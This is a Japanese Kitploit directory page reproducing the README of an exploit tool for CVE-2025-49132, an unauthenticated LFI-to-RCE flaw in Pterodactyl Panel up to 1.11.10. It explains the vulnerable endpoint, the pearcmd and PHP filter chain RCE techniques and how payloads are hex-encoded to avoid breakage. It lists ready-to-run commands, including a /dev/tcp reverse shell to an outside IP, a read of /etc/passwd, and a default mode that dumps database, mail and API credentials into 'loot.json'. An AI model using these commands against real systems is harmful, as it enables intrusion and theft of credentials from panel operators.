Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49132 — Pterodactyl Panel ≤ 1.11.10 のエクスプロイト - 未認証LFIからRCEへ | Kitploit
ツール/GitHubGitHub/yoyochaud/cve-2025-49132
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Pterodactyl Panel ≤ 1.11.10 のエクスプロイト - 未認証LFIからRCEへ

リポジトリを見る
25177ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49132 - Pterodactyl Panel の未認証 RCE

  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___|        |_|   /_/ |_|___/ /___|

Pterodactyl Panel ≤ 1.11.10 用エクスプロイト - 未認証の LFI から RCE へ。

脆弱性の詳細

/locales/locale.json エンドポイントは locale と namespace パラメータを受け取り、これらはサニタイズや認証なしで PHP の include() に直接渡されます。悪用防止を目的とした hash パラメータは、パッチ未適用バージョンでは一切強制されません。

これにより以下が可能になります:

  • ローカルファイルインクルージョン (LFI) - 任意の .php 設定ファイルを読み取り (データベース認証情報、APP_KEY、メール、セッション…)
  • リモートコード実行 (RCE) - pearcmd.php のインクルード (register_argc_argv + config-create のトリック)、PHP フィルターチェーン、または漏洩した APP_KEY による Laravel デシリアライゼーションを介して

影響を受けるバージョン: Pterodactyl Panel ≤ 1.11.10 修正バージョン: 1.11.11

なぜこの PoC なのか?

元の PoC は Python の requests を使用して pearcmd ペイロードを送信します。問題点: requests は <、>、{、} などの文字を黙って URL エンコードするため、URL 内に埋め込まれた PHP タグ (<?=system(...)?>) が壊れてしまいます。

このエクスプロイトは、2 つの主要な変更によりこの問題を修正しています:

  1. Stage 1 に curl を使用 - ペイロード作成リクエストは subprocess 経由で curl -g (globoff) を使用し、Python の URL エンコードを完全にバイパスします。
  2. コマンドエンコードに hex2bin() を使用 - 生のコマンド (スペースや特殊文字で壊れる) を注入する代わりに、コマンドを hex エンコードし、サーバー側で system(hex2bin('...')) によりデコードします。Hex は 0-9a-f のみを使用するため、+ も = も & もスペースも含まれません。つまり、>& や /dev/tcp/ を使用するリバースシェルを含む、あらゆるコマンドが動作します。
  3. 動的 PEAR パス - /usr/share/php をハードコードする多くの静的スクリプトとは異なり、このツールは --pear-dir 引数を完全にサポートします。カスタムパスを生の curl リクエストに動的に注入するため、標準的でない構成のターゲットも攻撃できます。
  4. オールインワン自動化 - 異なるベクターごとに個別のスクリプトに頼る代わりに、このツールは攻撃面全体 (pearcmd、PHP フィルター、デシリアライゼーション、LFI .php) を完全に自動化し、最も信頼性の高い RCE 経路を保証するためにあらゆる可能性をチェックします。

インストール

pip install requests

オプション (フィルターチェーン / デシリアライゼーション RCE 方式用):

pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

使用方法

RCE

# Simple command
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP filter chain (needs php_filter_chain_generator in PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Pre-generated filter chain
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Laravel deserialization via leaked APP_KEY (needs phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE with another pear directory
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Reverse shell 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

全設定ダンプ (デフォルトモード)

# Dumps all configs (DB creds, APP_KEY, mail, session, CORS…) + attempts auto RCE
python3 exploit.py http://panel.fr

オプション

オプション説明
targetターゲット URL (例: http://panel.pterodactyl.fr)
--rce-cmd CMDCMD を pearcmd 経由で実行 (リバースシェルを含む任意のコマンドをサポート)
--rce-filter CMDCMD を PHP フィルターチェーン経由で実行
--filter-chain CHAIN事前生成済みの php://filter チェーンを使用 (--rce-filter と併用)
--rce-d CMDCMD を Laravel デシリアライゼーション経由で実行
--pear-dir PATHpearcmd.php ディレクトリへのパス (デフォルト: /usr/share/php)
--timeout Nリクエストタイムアウト (秒) (デフォルト: 10)
--verify-sslSSL 証明書の検証を有効化 (デフォルトでは無効)
-o FILEレポートファイルの出力先 (デフォルト: loot.json)

一般的な --pear-dir の値

ディストリビューションパス
Debian / Ubuntu/usr/share/php (デフォルト)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 または /usr/share/php83
RHEL / Rocky/usr/share/pear

デフォルトモードでダンプされる内容

--rce-cmd / --rce-filter / --rce-d を指定せずに実行すると、エクスプロイトは設定の完全抽出を実行します:

  • データベース - MySQL のホスト、ポート、ユーザー、パスワード、データベース名 + Redis 設定
  • アプリケーション - APP_KEY (→ Laravel デシリアライゼーション)、バージョン、環境、デバッグモード
  • Pterodactyl - パネル固有の設定、2FA 設定、機能フラグ
  • セッション - ドライバー、クッキー設定、暗号化設定
  • 認証 - ロックアウト設定、パスワードリセットの有効期限
  • サービス - 外部 API キー (Mailgun、Postmark など)
  • メール - SMTP 認証情報、メーラー設定
  • キュー / キャッシュ / ハッシュ / CORS / ロギング / ファイルシステム
  • 機密ファイル - /etc/passwd、ホスト名、カーネルバージョンの読み取りを試行

完全な JSON レポートは loot.json に保存されます (-o でカスタムパスを指定可能)。

クレジット

このエクスプロイトは GRodolphe/CVE-2025-49132_poc の PoC を改良したものであり、その PoC 自体は 0xtensho/CVE-2025-49132-poc のオリジナル PoC に触発されたものです。

ツールをダウンロード